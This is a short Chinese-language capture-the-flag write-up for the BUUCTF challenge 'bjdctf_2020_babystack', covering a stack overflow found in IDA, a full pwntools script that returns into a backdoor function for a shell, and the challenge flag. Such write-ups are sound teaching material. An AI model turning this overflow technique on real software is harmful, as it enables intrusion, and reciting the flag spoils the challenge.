BUUCTF-bjdctf_2020_babystack writeup

checksec一下

 

 开启了NX保护

拖进IDA

 

 发现溢出点,read由用户控制输入的长度,而buf的实际长度只有6h,需要塞入10h的数据来溢出

在函数列表里发现后门函数

Payload如下

from pwn import *

elf = ELF('./babystack')
p = remote('node3.buuoj.cn',28348)
Payload = b'a'*(0x10 + 8) + p64(elf.sym['backdoor'])
p.sendline("100")
p.sendline(Payload)
p.interactive()

运行后得到sh

 

 在根目录下发现flag

flag{950f3182-02f4-4b09-8f8a-91253f6b8b68}

 

posted @ 2021-02-09 17:48  KaguyaSaikou  阅读(442)  评论(0)    收藏  举报